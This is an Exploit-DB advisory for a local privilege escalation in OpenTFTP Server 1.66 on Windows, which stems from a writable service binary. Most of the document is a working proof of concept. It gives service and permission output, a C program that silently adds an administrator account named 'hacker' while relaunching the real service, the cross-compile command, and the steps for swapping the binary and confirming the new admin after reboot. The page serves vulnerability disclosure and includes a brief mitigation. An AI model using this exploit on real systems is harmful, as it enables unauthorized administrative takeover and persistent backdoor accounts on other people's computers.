OpenTFTP 1.66 - Local Privilege Escalation

vendor:

OpenTFTP Server Single Port

by:

boku

7.2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: OpenTFTP Server Single Port

Affected Version From: 1.66

Affected Version To: 1.66

Patch Exists: NO

Related CWE: N/A

CPE: a:opentftp:opentftp_server_single_port

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 (32-bit)

2020

OpenTFTP 1.66 – Local Privilege Escalation

On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. This allows a low-privilge, local attacker to escalate their permissions to Administrator; by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the default installation. After the attacker has planted the malicious binary, the code will be executed with System priviledges on the next boot of the windows device.

Mitigation:

Ensure that the folder permissions are set to secure values and that the service binary is not writable by low-privilege users.

Source

Exploit-DB raw data:

# Exploit Title:   OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author:  boku
# Date: 2020-02-12
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link:   https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version:         1.66
# Tested On:       Windows 10 (32-bit)

# About:           
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, 
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." 
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/

# Vulnerability Details:
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. 
# This allows a low-privilge, local attacker to escalate their permissions to Administrator; 
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. 
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the 
# default installation. After the attacker has planted the malicious binary, the code will 
# be executed with System priviledges on the next boot of the windows device. See PoC below for details.

## Service Information (there is also an Unquoted Service Path)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\OpenTFTPServer\OpenTFTPServerSP.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Open TFTP Single Port Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                  BUILTIN\Users:(OI)(CI)(ID)R
                  NT AUTHORITY\Authenticated Users:(ID)C
                  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Users:(I)(RX)
                                       NT AUTHORITY\Authenticated Users:(I)(M)

## Local Privilege Escalation Proof of Concept
#0.  Download & install Open TFTP Server v1.66

#1.  Create low privileged user & change to the user
  C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
  User name                    lowPrivUser
  Local Group Memberships      *Users
  Global Group memberships     *None
  C:\>whoami
  mycomputer\lowprivuser 

#2.  Move the Service EXE to a new name
  C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
        1 file(s) moved.

#3.  Create malicious binary on kali linux
  1) Download dependencies
   root@kali# apt install gcc-mingw-w64-i686 wine64 -y
  2) Add Admin User C Code
   root@kali# cat addAdmin.c
   #include<windows.h>
   int main(void){
    system("net user hacker mypassword /add");
    system("net localgroup Administrators hacker /add");
    WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
    return 0;
   }
  3) Compile Code
   root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe

#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host 

#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
  C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
        1 file(s) moved.
  C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
  02/12/2020  05:59 PM           288,659 OpenTFTPServerSP.exe
  02/12/2020  06:38 PM           221,560 ~OpenTFTPServerSP.exe

#6. Reboot the Computer

#7. Look at that new Admin
  C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
  User name                    hacker
  Account active               Yes
  Local Group Memberships      *Administrators       *Users

  C:\Users\lowPrivUser>net localgroup Administrators
  Alias name     Administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members
  -------------------------------------------------------------------------------
  Administrator
  boku
  hacker